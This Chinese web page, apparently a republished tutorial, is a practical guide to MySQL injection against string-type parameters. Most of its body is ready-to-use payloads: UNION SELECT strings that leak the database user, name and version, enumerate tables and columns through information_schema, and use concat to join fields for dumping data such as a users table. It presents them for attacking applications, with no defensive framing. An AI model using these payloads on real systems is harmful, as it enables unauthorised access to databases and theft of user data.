最新文章专题视频专题问答1问答10问答100问答1000问答2000关键字专题1关键字专题50关键字专题500关键字专题1500TAG最新视频文章推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37视频文章20视频文章30视频文章40视频文章50视频文章60 视频文章70视频文章80视频文章90视频文章100视频文章120视频文章140 视频2关键字专题关键字专题tag2tag3文章专题文章专题2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章专题3
当前位置: 首页 - 科技 - 知识百科 - 正文

MYSQL注入语句实用精解_MySQL

来源:动视网 责编:小采 时间:2020-11-09 18:35:08
文档

MYSQL注入语句实用精解_MySQL

MYSQL注入语句实用精解_MySQL:bitsCN.com MYSQL注入语句实用精解 只讲字符型。 order by XXUnion select ..... 1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。1' UNION SELECT 1,CONCAT_WS(C
推荐度:
导读MYSQL注入语句实用精解_MySQL:bitsCN.com MYSQL注入语句实用精解 只讲字符型。 order by XXUnion select ..... 1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。1' UNION SELECT 1,CONCAT_WS(C


bitsCN.com

MYSQL注入语句实用精解

只讲字符型。

order by XX

Union select .....

1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。

1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #

上面是字符型的,注释符为 # , CONCAT_WS 为用分隔符隔开连接的字符。

获取数据库等的信息

1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #

concat产生只是字符串连接,不用也可以,也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。

1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #

0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里,数据库知道了,表知道了,表的字段也知道了。剩下的还不会查吗。直接union 查。

库information_schema 中的表tables 有 table_schema(数据库名) 和 table_name(表名) 两个主要字段

库information_schema 中的表columns 有 table_name(表名) 和 column_name(列名) 两主要字段

就算是 order by 出来只有一个可以显示也没关系。可以用concat

如: concat(字段,0x3a,字段) 把两个字段显示出来了。中间那个是 : 的十六进制表示形式。

bitsCN.com

文档

MYSQL注入语句实用精解_MySQL

MYSQL注入语句实用精解_MySQL:bitsCN.com MYSQL注入语句实用精解 只讲字符型。 order by XXUnion select ..... 1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。1' UNION SELECT 1,CONCAT_WS(C
推荐度:
标签: 语句 mysql sql注入
  • 热门焦点

最新推荐

猜你喜欢

热门推荐

专题
Top